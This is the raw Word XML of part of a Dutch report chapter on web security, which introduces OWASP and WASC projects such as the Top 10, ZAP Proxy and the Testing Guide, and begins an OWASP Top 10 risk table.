            <wp:docPr id="706"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AF653C" w14:textId="479FA81C" w:rsidR="00241096" w:rsidRDefault="00241096" w:rsidP="00C94890">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253186048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BD27E9C" wp14:editId="69F19E31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10732135" cy="7429317"/>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1920 – 1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10732788" cy="7429769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="530122D9" w14:textId="3B3D7F97" w:rsidR="00241096" w:rsidRDefault="00241096">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253187072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F15B66A" wp14:editId="0387AA50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10668635" cy="7429317"/>
            <wp:effectExtent l="0" t="0" r="0" b="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Web 1920 – 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10668635" cy="7429317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E8199" w14:textId="77777777" w:rsidR="00905AD1" w:rsidRPr="00241096" w:rsidRDefault="00905AD1" w:rsidP="00241096">
      <w:pPr>
        <w:sectPr w:rsidR="00905AD1" w:rsidRPr="00241096" w:rsidSect="00241096">
          <w:headerReference w:type="first" r:id="rId30"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1440" w:bottom="0" w:left="1440" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318695B4" w14:textId="7EF547E2" w:rsidR="0080388C" w:rsidRPr="004A7280" w:rsidRDefault="00534DB4" w:rsidP="00C94890">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1020"/>
        </w:tabs>
        <w:sectPr w:rsidR="0080388C" w:rsidRPr="004A7280" w:rsidSect="00534DB4">
          <w:headerReference w:type="first" r:id="rId31"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="23" w:bottom="1417" w:left="0" w:header="0" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252293120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4813F3E5" wp14:editId="6E8A23CF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>441960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1734185</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E2204E" w:rsidRPr="00A14BEE" w:rsidRDefault="00E2204E"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43" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.8pt;margin-top:136.55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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7AD5B74A" w14:textId="6D434390" w:rsidR="00E2204E" w:rsidRPr="00A14BEE" w:rsidRDefault="00E2204E"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Pr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252348416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75561588" wp14:editId="0E93D666">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>504190</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>243205</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0">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172736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23E9854F" wp14:editId="484E37AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>636905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5162550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5080635" cy="1252855"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="776" name="Text Box 776"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5080635" cy="125285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C569A10" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="006E3740" w:rsidRDefault="00E2204E"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54F" id="Text Box 776" o:spid="_x0000_s1044" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:50.15pt;margin-top:406.5pt;width:400.05pt;height:98.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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C569A10" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="006E3740" w:rsidRDefault="00E2204E"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253173760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D06D361" wp14:editId="0E16220E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>440185</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4932932</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5570029" cy="1713230"/>
                <wp:effectExtent l="0" t="0" r="18415" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="778" name="Rounded Rectangle 778"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5570029" cy="171323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ECBDB" id="Rounded Rectangle 778" o:spid="_x0000_s1026" style="position:absolute;margin-left:34.65pt;margin-top:388.4pt;width:438.6pt;height:134.9pt;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67520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02BB8540" wp14:editId="028CEF5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>573405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>321691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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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45" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:45.15pt;margin-top:253.3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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="685849B0" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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Pr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252334080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00F016DE" wp14:editId="627EF445">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>451328</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2989406</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4419" id="Rounded Rectangle 561" o:spid="_x0000_s1026" style="position:absolute;margin-left:35.55pt;margin-top:235.4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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D1592">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252261376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="725BD551" wp14:editId="149D60E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7557135" cy="107467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7557135" cy="10746740"/>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8586" id="Rectangle 21" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:-70.8pt;width:595.05pt;height:846.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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F8B394" w14:textId="4821E2D0"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4BD751C">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CE52C"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p>
    <w:p w14:paraId="2A400921" w14:textId="1F60EB49" w:rsidR="00382817" w:rsidRPr="00382817" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00382817" w:rsidRPr="00382817">
        <w:t>Inleiding</w:t>
      </w:r>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821F2"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Hoe groot is het security probleem?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FFD6B" w14:textId="36A40FBB"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Sucuri rapporten uit om de geïnteresseerde te informeren over de stand van zaken op </w:t>
      </w:r>
      <w:r w:rsidR="0049510C">
        <w:t>securitygebied</w:t>
      </w:r>
      <w:r w:rsidR="00E60EEC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDFB91B" w14:textId="77777777" w:rsidR="00813FA2" w:rsidRDefault="00813FA2" w:rsidP="004E1E32"/>
    <w:p w14:paraId="4B055294" w14:textId="3BA52986" w:rsidR="00573A86" w:rsidRPr="00723BE8" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B86">
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="004D61D9" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="00B674DC" w:rsidRPr="00723BE8">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="007F2C89">
        <w:t xml:space="preserve"> en de kwetsbaarheden</w:t>
      </w:r>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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="008668EF" w14:paraId="15CA7AF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0BE3D3" w14:textId="2E250FD0" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Classificatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="402FD0D9" w14:textId="14489431" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056BDB58" w14:textId="07F23936" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="098783D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0259" w14:textId="1FDC9486" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20AFB9EB" w14:textId="22E49B0A"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107C3EF2" w14:textId="7E4F52F5" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="63ED4312"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2ED96BE1" w14:textId="2062F4E4" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="660C66FC" w14:textId="3B93745A" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D7BFFF" w14:textId="6F41E85B" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>ZAP Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="210632EE"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32F48A" w14:textId="0B42D83E" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DDC144B" w14:textId="2889D542"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5F0369FF" w14:textId="4D365640" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Code Review Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="10CD72E8"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05DC9F65" w14:textId="7F2CF2E5" w:rsidR="008668EF" w:rsidRDefault="00E21220">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BDB8B61" w14:textId="3FC25999" w:rsidR="008668EF" w:rsidRDefault="00E21220">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307EF017" w14:textId="74BE8CDB" w:rsidR="008668EF" w:rsidRDefault="00E21220">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Testing Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48D9A722" w14:textId="7A371FB0" w:rsidR="00E21220" w:rsidRDefault="002F0F65">
      <w:r>
        <w:t>Tabel 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104F5DF" w14:textId="1C0FB3F9" w:rsidR="00DD682C" w:rsidRDefault="001763A1">
      <w:r>
        <w:t>WASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57138CAC" w14:textId="55820BF4"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3F840"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 xml:space="preserve">Maar zijn meer gericht op het publiceren van artikelen, onderzoeksrapporten en zoals eerder </w:t>
      </w:r>
      <w:r w:rsidR="003D00E6">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6F06A"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3A6253">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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD13FB" w14:paraId="28C589D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F6456" w14:textId="25FA9E06" w:rsidR="00CD13FB" w:rsidRDefault="00314727">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E90DDD" w14:textId="7C2CBB44" w:rsidR="00CD13FB" w:rsidRDefault="00314727">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD13FB" w:rsidRPr="00422628" w14:paraId="519686F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46AE10" w14:textId="7FED4886" w:rsidR="00CD13FB" w:rsidRDefault="00DE1933">
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B90804A" w14:textId="5B54E4EC" w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w:rsidRDefault="00DE1933">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE1933">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Web Application Security Scanner Evaluation Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w14:paraId="5E32036F" w14:textId="77777777" w:rsidTr="008550FD">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>WASC Threat Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="276006FC" w14:textId="7B8A5C51"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3915AD15" w:rsidR="003B11B2" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00FC3328">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="003B11B2" w:rsidRPr="00FC3328">
        <w:t>OWASP top 10 lijst</w:t>
      </w:r>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A1 Injection</w:t>
      </w:r>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r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ecur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6BB9CC2D" w:rsidR="003B11B2" w:rsidRDefault="00A0171A" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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6CBDB381"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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="704"/>
        <w:gridCol w:w="2030"/>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="1449"/>
        <w:gridCol w:w="1439"/>
        <w:gridCol w:w="1797"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A6DC7" w14:paraId="685392DE"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44BF3C" w14:textId="573D5CC1" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C3ADFA" w14:textId="5F177DDF" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Vaak voorkomend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF63725" w14:textId="0A66FEB2" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Exploiteerbaar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69AE72C9" w14:textId="1B928F66" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
